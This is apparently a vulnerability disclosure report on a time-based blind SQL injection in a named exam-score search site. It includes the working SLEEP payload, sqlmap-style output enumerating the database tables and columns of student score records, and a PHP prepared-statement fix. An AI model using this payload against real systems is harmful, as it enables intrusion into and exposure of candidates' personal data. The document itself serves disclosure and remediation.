Injection point: http://app.eduuu.com/wulijs/search.php
POST data: yid=10&con_id=17&exam_code=123123&name=123213&submit=
Parameters such as yid are vulnerable to injection.
---
Place: POST
Parameter: yid
Type: AND/OR time-based blind
Title: MySQL > 5.0.11 AND time-based blind
Payload: yid=10' AND SLEEP(5) AND 'djDf'='djDf&con_id=17&exam_code=123123&name=123213&submit=
---
back-end DBMS: MySQL 5.0.11
Database: wljs_score
[11 tables]
+----------------+
| Sheet1 |
| user |
| aa |
| bak |
| contest |
| contest1 |
| score |
| score1 |
| score_20120507 |
| test |
| uear |
+----------------+
---
back-end DBMS: MySQL 5.0.11
Database: wljs_score
+-------+---------+
| Table | Entries |
+-------+---------+
| score | 8143 |
+-------+---------+
---
back-end DBMS: MySQL 5.0.11
Database: wljs_score
+--------+---------+
| Table | Entries |
+--------+---------+
| score1 | 2575 |
+--------+---------+
---
back-end DBMS: MySQL 5.0.11
Database: wljs_score
Table: score
[8 columns]
+--------------+--------------+
| Column | Type |
+--------------+--------------+
| con_id | int(8) |
| exam_code | varchar(32) |
| name | varchar(50) |
| sc_id | int(8) |
| school | varchar(50) |
| score | int(3) |
| score_detail | varchar(255) |
| status | tinyint(1) |
+--------------+--------------+
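The data amounts to roughly 10,000 rows, including candidates' names, schools, exam admission numbers and detailed scores. Once dumped, it could be put to illegal use.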
No data was downloaded.
#1. Filter the parameters
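
One way to implement the "filter the parameters" fix for the POST fields above, as an added example that is not code from the original report or from the site: it validates the numeric fields and binds every value through a PDO prepared statement. The query shape, the `yid` column, the `find_score` name and the sample row are assumptions, and an in-memory SQLite database stands in for MySQL so the script runs offline.

```php
<?php
// Added example, not the site's code. Assumed: query shape, a yid column,
// the find_score() name and the sample row (all constructed for this demo).
function find_score(PDO $db, array $post): array
{
    // Numeric fields must be plain integers; anything else is rejected.
    $yid    = filter_var($post['yid'] ?? null, FILTER_VALIDATE_INT);
    $con_id = filter_var($post['con_id'] ?? null, FILTER_VALIDATE_INT);
    if ($yid === false || $con_id === false) {
        throw new InvalidArgumentException('yid and con_id must be integers');
    }
    // Text fields: strings only, bounded by the column sizes in the report
    // (exam_code varchar(32), name varchar(50)).
    $exam_code = $post['exam_code'] ?? '';
    $name      = $post['name'] ?? '';
    if (!is_string($exam_code) || $exam_code === '' || strlen($exam_code) > 32
        || !is_string($name) || $name === '' || strlen($name) > 50) {
        throw new InvalidArgumentException('invalid exam_code or name');
    }
    // Values are bound, never concatenated into the SQL text.
    $stmt = $db->prepare(
        'SELECT name, school, score FROM score
          WHERE yid = :yid AND con_id = :con_id
            AND exam_code = :exam_code AND name = :name'
    );
    $stmt->bindValue(':yid', $yid, PDO::PARAM_INT);
    $stmt->bindValue(':con_id', $con_id, PDO::PARAM_INT);
    $stmt->bindValue(':exam_code', $exam_code, PDO::PARAM_STR);
    $stmt->bindValue(':name', $name, PDO::PARAM_STR);
    $stmt->execute();
    return $stmt->fetchAll(PDO::FETCH_ASSOC);
}

// Constructed demo database (SQLite in memory stands in for MySQL).
$db = new PDO('sqlite::memory:');
$db->setAttribute(PDO::ATTR_ERRMODE, PDO::ERRMODE_EXCEPTION);
$db->exec('CREATE TABLE score (yid INT, con_id INT, exam_code TEXT, name TEXT, school TEXT, score INT)');
$db->exec("INSERT INTO score VALUES (10, 17, '123123', 'Sample Student', 'Sample School', 88)");

$ok = ['yid' => '10', 'con_id' => '17', 'exam_code' => '123123', 'name' => 'Sample Student'];
echo 'valid request rows: ', count(find_score($db, $ok)), "\n";

// A quote in a text field is matched as literal data by the bound parameter.
echo 'quoted name rows: ', count(find_score($db, ['name' => "x' OR '1'='1"] + $ok)), "\n";

// The yid string from the report fails integer validation before any SQL runs.
try {
    find_score($db, ['yid' => "10' AND SLEEP(5) AND 'djDf'='djDf"] + $ok);
} catch (InvalidArgumentException $e) { echo 'rejected: ', $e->getMessage(), "\n"; }
```

Against MySQL, create the PDO connection with `PDO::ATTR_EMULATE_PREPARES` set to `false` so the server performs the parameter binding.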